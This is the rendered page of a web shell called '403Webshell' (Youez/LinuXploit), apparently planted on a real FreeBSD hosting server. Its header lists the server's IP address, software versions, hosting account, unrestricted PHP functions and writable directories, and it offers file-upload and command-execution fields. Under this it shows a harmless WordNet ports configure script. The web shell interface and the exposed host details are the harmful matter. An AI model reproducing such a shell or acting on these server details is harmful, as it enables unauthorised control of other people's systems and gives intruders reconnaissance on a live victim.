403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/textproc/wordnet/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/textproc/wordnet/scripts/configure
#!/bin/sh
for mf in ${FILESDIR}/*Makefile ; do \
	dir=`basename $mf | sed -e s%Makefile%% -e 's%\.%/%g'`
	case "$dir" in
	"man/")
		dir=doc/man/
		;;
	"src/lib/")
		dir=lib/
		;;
	"src/wn/")
		dir=src/
		;;
	"src/wnb/")
		dir=lib/wnres/
		;;
	esac
	dir=${WRKSRC}/$dir
	test -f ${dir}Makefile.orig && continue
	test -f ${dir}Makefile && mv ${dir}Makefile ${dir}Makefile.orig
	ln -s $mf ${dir}Makefile
done

patch -d ${WRKSRC}/src -p0 << EOPATCH
Configuring the wnb script to call the right wish-binary directly
--- wnb	Sun Feb 22 12:49:56 1998
+++ wnb	Sat Feb 26 17:41:06 2000
@@ -1,6 +1,3 @@
-#!/bin/sh 
-# the following line is evaluated by sh but ignored by tcl \\
-wishwn "\$0" "\$@" &
-# the following line is evaluated by sh but ignored by tcl \\
-exec true
-# the preceding lines make this script self-executing on unix systems
+#!${PREFIX}/bin/wish${TCL_DVER}
+
+package require Wordnet
EOPATCH

Youez - 2016 - github.com/yon3zu
LinuXploit